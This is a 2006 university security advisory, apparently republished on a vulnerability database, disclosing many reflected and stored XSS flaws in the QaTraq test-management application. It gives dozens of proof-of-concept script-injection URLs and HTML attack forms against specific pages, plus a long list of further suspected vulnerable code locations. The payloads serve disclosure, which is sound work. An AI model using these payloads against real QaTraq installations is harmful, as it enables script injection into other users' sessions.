QaTraq 6.5 RC: Multiple XSS Vulnerabilities

2006.07.01
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

=========================================================== QaTraq 6.5 RC: Multiple XSS Vulnerabilities =========================================================== Technical University of Vienna Security Advisory TUVSA-0606-001, June 23, 2006 =========================================================== Affected applications ---------------------- QaTraq (http://sourceforge.net/projects/qatraq/) Versions 6.5 RC and prior. Description ------------ There are a number of reflected XSS vulnerabilities, some of which are also stored XSS vulnerabilities and perhaps even SQL injection vulnerabilitities. The affected program points as well as demo exploits are given below. The exploits have been tested with the user being logged in as admin, and register_globals being active. It is possible that some vulnerabilities do not require register_globals to be enabled, although we have not tested this. Some of the parameters in the given sample exploits (mainly "id" params) have to be adjusted to the given installation to match existing database entries. In addition to program points for which exploits are given, we have listed about 200 places that are very similar in structure. Although we have not explicitly tested them with exploits, we suspect that they are vulnerable as well. top.inc --------- line 1005 http://localhost/qatraq65rc/queries_view_search.php?link_print='"><scrip t>alert('hi')</script> line 1007 http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='"><scr ipt>alert('hi')</script> line 1020 http://localhost/qatraq65rc/queries_view_search.php?link_sql='"><script> alert('hi')</script> line 1041 http://localhost/qatraq65rc/queries_view_search.php?link_next="><script> alert('hi')</script> line 1054 http://localhost/qatraq65rc/queries_view_search.php?link_prev="><script> alert('hi')</script> line 1067 http://localhost/qatraq65rc/queries_view_search.php?link_list="><script> alert('hi')</script> components_copy_content.php ----------------------------- line 233 http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id= 1&msg=<script>alert('hi')</script> [product_id and id (= component id) must exist in the database] line 238 - use the attack page: <form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_ id=1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 260 - analogous to 238: <form method="post" action="http://localhost/qatraq65rc/components_copy_content.php?product_ id=1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="component_name" value='some_new_name'/> <input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> components_modify_content.php ------------------------------- line 213 http://localhost/qatraq65rc/components_modify_content.php?product_id=1&i d=1&msg=<script>alert('hi')</script> line 218 <form method="post" action="http://localhost/qatraq65rc/components_modify_content.php?produc t_id=1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 240 <form method="post" action="http://localhost/qatraq65rc/components_modify_content.php?produc t_id=1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="component_name" value='some_new_name'/> <input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> components_new_content.php ----------------------------- line 188 http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1 &msg=<script>alert('hi')</script> line 193 <form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_i d=1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="component_name" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 215 <form method="post" action="http://localhost/qatraq65rc/components_new_content.php?product_i d=1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="component_name" value='another_new_name'/> <input type="hidden" name="component_desc" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> design_copy_content.php ------------------------- line 262 - use this page [plan_id must exist in the database]: <form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_ id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 276 <form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_ id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="version" value='<script>alert("hi")</script>'/> <input type="submit"/> </form> line 313 <form method="post" action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_ id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> design_copy_plan_search.php ----------------------------- line 106 <form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&p lan_id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="plan_title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 107 <form method="post" action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&p lan_id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="plan_content" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> design_modify_content.php --------------------------- line 282 <form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_ id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 298 - $new_doc_id is constructed from $major_version and $minor_version on line 189; these two are only set if POST['version_increment'] is set; use this page [and watch for suitable id]: <form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=7"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/> <input type="submit"/> </form> line 311 - $new_version, analogous to 298 line 354 <form method="post" action="http://localhost/qatraq65rc/design_modify_content.php?id=10"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> design_new_content.php ------------------------ line 226 <form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 240 <form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="version" value='<script>alert("hi")</script>'/> <input type="submit"/> </form> line 276 <form method="post" action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> design_new_search.php ----------------------- line 99 http://localhost/qatraq65rc/design_new_search.php?plan_name="><script>al ert('hi')</script> line 100 http://localhost/qatraq65rc/design_new_search.php?plan_desc="><script>al ert('hi')</script> download.php ------------- line 31 http://localhost/qatraq65rc/download.php?file_name=<script>alert('hi')</ script> login.php ---------- line 88 http://localhost/qatraq65rc/login.php?username="><script>alert('hi')</sc ript> line 98 http://localhost/qatraq65rc/login.php?password="><script>alert('hi')</sc ript> phase_copy_content.php ------------------------ line 245 <form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 259 <form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="version" value='<script>alert("hi")</script>'/> <input type="submit"/> </form> line 285 <form method="post" action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> phase_delete_search.php ------------------------- line 176 <form method="post" action="http://localhost/qatraq65rc/phase_delete_search.php"> <input type="hidden" name="page_action" value="search"/> <input type="hidden" name="content" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> phase_modify_content.php -------------------------- line 273 <form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_i d=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 289 <form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="minor_version" value='<script>alert("hi")</script>'/> <input type="submit"/> </form> line 302 - $new_version, analogous to 289 line 335 <form method="post" action="http://localhost/qatraq65rc/phase_modify_content.php?id=2"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> phase_modify_search.php ------------------------ line 177 <form method="post" action="http://localhost/qatraq65rc/phase_modify_search.php"> <input type="hidden" name="page_action" value="search"/> <input type="hidden" name="content" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> phase_new_content.php ---------------------- line 209 <form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id =1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="title" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 223 <form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id =1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="version" value='<script>alert("hi")</script>'/> <input type="submit"/> </form> line 252 <form method="post" action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id =1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="content" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> phase_view_search.php ---------------------- line 176 <form method="post" action="http://localhost/qatraq65rc/phase_view_search.php"> <input type="hidden" name="page_action" value="search"/> <input type="hidden" name="content" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> products_copy_content.php --------------------------- line 175 http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1& msg=<script>alert('hi')</script> line 180 <form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id =1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="product_name" value='"><script>alert("hi")</script>'/> <input type="submit"/> </form> line 185 <form method="post" action="http://localhost/qatraq65rc/products_copy_content.php?product_id =1&id=1"> <input type="hidden" name="page_action" value="save"/> <input type="hidden" name="product_name" value='some_new_name'/> <input type="hidden" name="product_desc" value='</textarea><script>alert("hi")</script>'/> <input type="submit"/> </form> Other suspicious places (without exploits) --------------------------------------------- - products_copy_search.php, line 116, $product_name - products_copy_search.php, line 117, $product_desc - products_delete_search.php, line 116, $product_name - products_delete_search.php, line 117, $product_desc - products_modify_content.php, line 186, $msg - products_modify_content.php, line 191, $product_name - products_modify_content.php, line 196, $product_desc - products_modify_search.php, line 116, $product_name - products_modify_search.php, line 117, $product_desc - products_new_content.php, line 157, $msg - products_new_content.php, line 162, $product_name - products_new_content.php, line 167, $product_desc - products_view_search.php, line 116, $product_name - products_view_search.php, line 117, $product_desc - queries_copy_content.php, line 182, $msg - queries_copy_content.php, line 195, $title - queries_copy_content.php, line 227, $description - queries_copy_search.php, line 154, $title - queries_copy_search.php, line 155, $id - queries_copy_search.php, line 170, $description - queries_delete_search.php, line 152, $title - queries_delete_search.php, line 153, $id - queries_delete_search.php, line 167, $description - queries_modify_content.php, line 247, $msg - queries_modify_content.php, line 260, $title - queries_modify_content.php, line 292, $description - queries_modify_content.php, line 308, $query - queries_modify_search.php, line 152, $title - queries_modify_search.php, line 153, $id - queries_modify_search.php, line 167, $description - queries_new_content.php, line 162, $msg - queries_new_content.php, line 174, $title - queries_new_content.php, line 222, $query - queries_view_search.php, line 156, $title - queries_view_search.php, line 157, $id - queries_view_search.php, line 172, $description - reports_copy_content.php, line 202, $msg - reports_copy_content.php, line 215, $title - reports_copy_content.php, line 247, $description - reports_copy_content.php, line 255, $tmt - reports_copy_search.php, line 147, $title - reports_copy_search.php, line 148, $id - reports_delete_search.php, line 148, $title - reports_delete_search.php, line 149, $id - reports_modify_content.php, line 266, $msg - reports_modify_content.php, line 279, $title - reports_modify_content.php, line 311, $description - reports_modify_content.php, line 319, $query $tmt - reports_modify_search.php, line 148, $title - reports_modify_search.php, line 149, $id - reports_new_content.php, line 162, $msg - reports_new_content.php, line 174, $title - reports_new_content.php, line 190, $report_type - reports_new_content.php, line 206, $description - reports_new_content.php, line 214, $query $tmt - reports_view_content.php, line 187, $tmt - reports_view_content.php, line 194, $results - reports_view_search.php, line 147, $title - reports_view_search.php, line 148, $id - reports_view_search.php, line 147, $title - reports_view_search.php, line 148, $id - requ_copy_content.php, line 217, $title - requ_copy_content.php, line 252, $url - requ_copy_content.php, line 274, $content - requ_modify_content.php, line 209, $title - requ_modify_content.php, line 244, $url - requ_modify_content.php, line 266, $content - requ_new_content.php, line 185, $title - requ_new_content.php, line 214, $url - requ_new_content.php, line 237, $content - requ_new_search.php, line 99, $product_name - requ_new_search.php, line 100, $product_desc - results_modify_multiple.php, line 657, -> includes/ui.inc, line 116 - results_modify_multiple.php, line 395, $msg - results_modify_search.php, line 182, $content - results_modify_single.php, line 429, $msg - results_modify_single.php, line 850, $TestDate - results_view_multiple.php, line 125, $msg - results_view_search.php, line 182, $content - results_view_single.php, line 164, $msg - roles_copy_content.php, line 190, $msg - roles_copy_content.php, line 195, $role_name - roles_copy_content.php, line 200, $role_desc - roles_copy_search.php, line 117, $role_name - roles_copy_search.php, line 118, $role_desc - roles_delete_search.php, line 118, $role_name - roles_delete_search.php, line 119, $role_desc - roles_modify_content.php, line 203, $msg - roles_modify_content.php, line 208, $role_name - roles_modify_content.php, line 213, $role_desc - roles_modify_search.php, line 118, $role_name - roles_modify_search.php, line 119, $role_desc - roles_new_content.php, line 172, $msg - roles_new_content.php, line 177, $role_name - roles_new_content.php, line 182, $role_desc - roles_view_search.php, line 118, $role_name - roles_view_search.php, line 119, $role_desc - test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url - test_cases_copy_content.php, line 289, $title - test_cases_copy_content.php, line 303, $version - test_cases_copy_content.php, line 382, $content - test_cases_modify_content.php, line 383, $title - test_cases_modify_content.php, line 399, $new_doc_id - test_cases_modify_content.php, line 412, $new_version - test_cases_modify_content.php, line 486, $content - test_cases_modify_content.php, line 536, $filter_title - test_cases_modify_content.php, line 537, $filter_tsc_id - test_cases_new_content.php, line 341, $title - test_cases_new_content.php, line 355, $version - test_cases_new_content.php, line 431, $content - test_cases_new_content.php, line 481, $filter_title - test_cases_new_content.php, line 482, $filter_tsc_id - test_cases_new_search.php, line 99, $product_name - test_cases_new_search.php, line 100, $product_desc - test_cases_view_content.php, line 302, $filter_tsc_id - test_plans_copy_content.php, line 274, $title - test_plans_copy_content.php, line 292, $version - test_plans_copy_content.php, line 344, $content - test_plans_modify_content.php, line 306, $title - test_plans_modify_content.php, line 322, $new_doc_id - test_plans_modify_content.php, line 339, $new_version - test_plans_modify_content.php, line 398, $content - test_plans_new_content.php, line 240, $title - test_plans_new_content.php, line 258, $version - test_plans_new_content.php, line 313, $content - test_plans_new_search.php, line 96, $project_name - test_plans_new_search.php, line 97, $project_desc - test_scripts_copy_content.php, line 354, $title - test_scripts_copy_content.php, line 368, $version - test_scripts_copy_content.php, line 500, $content - test_scripts_copy_design_search.php, line 100, $design_title - test_scripts_copy_search.php, line 180, $content - test_scripts_delete_search.php, line 182, $content - test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, $table_name - test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 34, $table_name - test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 198, $base_url - test_scripts_include_cases_search.php, line 427, $msg - test_scripts_include_cases_search.php, line 576, $test_script[Title] - test_scripts_include_cases_search.php, line 798, $tc_msg - test_scripts_include_cases_search.php, line 809, $tc_title - test_scripts_include_cases_search.php, line 823, $tc_version - test_scripts_include_cases_search.php, line 1074, $row[Title] - test_scripts_include_cases_search.php, line 1084, $row - test_scripts_include_cases_search.php, line 1087, $row - test_scripts_include_cases_search.php, line 1096, $row[DocumentID] - test_scripts_include_cases_search.php, line 1105, $row[ID] - test_scripts_include_cases_search.php, line 1106, $row[ID] - test_scripts_include_cases_search.php, line 1108, $row[ID] - test_scripts_include_cases_search.php, line 1109, $row[ID] - test_scripts_include_cases_search.php, line 1118, $row - test_scripts_include_cases_search.php, line 1124, $row $ordering - test_scripts_include_search.php, line 163, $content - test_scripts_modify_content.php, line 404, $title - test_scripts_modify_content.php, line 420, $new_doc_id - test_scripts_modify_content.php, line 433, $new_version - test_scripts_modify_content.php, line 581, $content - test_scripts_modify_content.php, line 726, $ordering_ - test_scripts_modify_search.php, line 181, $content - test_scripts_new_content.php, line 293, $title - test_scripts_new_content.php, line 307, $version - test_scripts_new_content.php, line 426, $content - test_scripts_new_search.php, line 93, $design_title - test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, $table_name - test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, $table_name - test_scripts_remove_cases_search.php, line 148, $msg - test_scripts_remove_cases_search.php, line 256, $test_script[Title] - test_scripts_remove_cases_search.php, line 381, $row[Title] - test_scripts_remove_cases_search.php, line 387, $is_selected $row - test_scripts_remove_cases_search.php, line 393, $row[DocumentID] - test_scripts_remove_cases_search.php, line 405, $row[Ordering] - test_scripts_remove_cases_search.php, line 423, $row[Title] - test_scripts_remove_search.php, line 165, $content - test_scripts_view_search.php, line 182, $content - upload.php, line 51 - users_copy_content.php, line 249, $msg - users_copy_content.php, line 254, $login_name - users_copy_content.php, line 258, $user_name - users_copy_content.php, line 263, $user_password - users_copy_search.php, line 129, $login_name - users_copy_search.php, line 130, $user_name - users_copy_search.php, line 131, $default_role - users_delete_content.php, line 146, $msg - users_delete_search.php, line 129, $login_name - users_delete_search.php, line 130, $user_name - users_delete_search.php, line 131, $default_role - users_modify_content.php, line 463, -> includes/ui.inc, line 116, $arr_table_vals[table_multi_display_line.$i] - users_modify_content.php, line 385, $msg - users_modify_content.php, line 394, $user_name - users_modify_content.php, line 399, $user_password - users_modify_search.php, line 127, $login_name - users_modify_search.php, line 128, $user_name - users_modify_search.php, line 129, $default_role - users_new_content.php, line 233, $msg - users_new_content.php, line 238, $login_name - users_new_content.php, line 242, $user_name - users_new_content.php, line 247, $user_password - users_new_content.php, line 251, $user_password2 - users_view_content.php, line 138, $msg - users_view_search.php, line 129, $login_name - users_view_search.php, line 130, $user_name - users_view_search.php, line 131, $default_role - versions_copy_content.php, line 370, $msg - versions_copy_content.php, line 375, $version_name - versions_copy_content.php, line 380, $version_desc - versions_modify_content.php, line 345, $msg - versions_modify_content.php, line 350, $version_name - versions_modify_content.php, line 355, $version_desc - versions_new_content.php, line 322, $msg - versions_new_content.php, line 327, $version_name - versions_new_content.php, line 332, $version_desc - versions_new_content.php, line 339, $version_date Solution --------- The authors did not respond to our notification, so there is no official solution available yet. Timeline: June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot sourceforge dot net" and "traq at users dot sourceforge dot net". June 23, 2006: Advisory submission. References ----------- http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt Nenad Jovanovic Secure Systems Lab Technical University of Vienna www.seclab.tuwien.ac.at


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top